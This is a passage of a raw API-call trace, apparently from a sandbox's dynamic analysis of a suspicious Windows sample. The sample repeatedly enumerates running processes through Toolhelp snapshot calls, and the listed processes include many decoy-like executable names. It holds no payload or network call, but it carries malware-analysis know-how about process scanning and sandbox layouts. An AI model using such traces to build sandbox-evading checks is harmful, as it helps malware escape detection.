th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0155.037] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0155.038] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0155.039] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0155.040] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0155.042] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0155.043] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0155.044] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0155.045] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0155.046] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0155.047] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0155.048] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0155.049] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0155.050] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0155.051] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0155.052] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0155.053] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0155.054] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0155.055] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0155.056] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0155.058] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0155.059] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0155.060] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0155.061] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0155.062] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0155.063] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0155.064] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0155.065] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0155.065] CloseHandle (hObject=0xbc) returned 1 [0155.065] Sleep (dwMilliseconds=0x12c) [0155.373] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0155.379] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0155.380] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0155.381] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0155.381] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0155.382] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0155.383] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0155.387] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0155.387] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0155.388] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0155.389] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0155.390] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0155.391] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0155.392] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0155.393] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0155.394] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0155.395] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0155.396] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0155.396] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0155.397] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0155.399] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0155.401] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0155.402] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0155.404] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0155.405] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0155.407] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0155.409] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0155.410] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0155.412] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0155.413] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0155.415] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0155.416] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0155.417] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0155.427] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0155.429] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0155.430] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0155.432] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0155.433] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0155.435] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0155.436] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0155.438] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0155.439] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0155.440] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0155.442] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0155.443] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0155.444] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0155.446] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0155.447] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0155.448] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0155.450] CloseHandle (hObject=0xc4) returned 1 [0155.450] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0155.456] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0155.457] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0155.458] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0155.459] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0155.460] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0155.461] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0155.462] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 